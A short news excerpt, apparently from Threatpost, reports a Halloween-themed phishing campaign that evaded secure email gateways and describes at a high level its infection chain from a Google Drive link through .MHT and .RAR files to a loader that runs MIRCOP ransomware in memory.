Ransomware Phishing Emails Sneak Through SEGs

The MICROP ransomware spreads via Google Drive and locally stored passwords.

Secure email gateway (SEG) protections aren’t necessarily enough to stop phishing emails from delivering ransomware to employees, especially if the cybercrooks are using legitimate cloud services to host malicious pages.

Researchers are raising the alarm over a phishing email kicking off a Halloween-themed MICROP ransomware offensive, which they observed making its way to a target’s inbox despite its being secured by an SEG.

Infection Routine

The original email purported to need support for a “DWG following Supplies List,” which is supposedly hyperlinked to a Google Drive URL. The URL is actually an infection link, which downloaded an .MHT file.

“.MHT file extensions are commonly used by web browsers as a webpage archive,” Cofense researchers explained. “After opening the file the target is presented with a blurred out and apparently stamped form, but the threat actor is using the .MHT file to reach out to the malware payload.”

That payload comes in the form of a downloaded .RAR file, which in turn contains an .EXE file.

“The executable is a DotNETLoader that uses VBS scripts to drop and run the MIRCOP ransomware in memory,”

Read More: https://threatpost.com/ransomware-phishing-emails-segs/176470/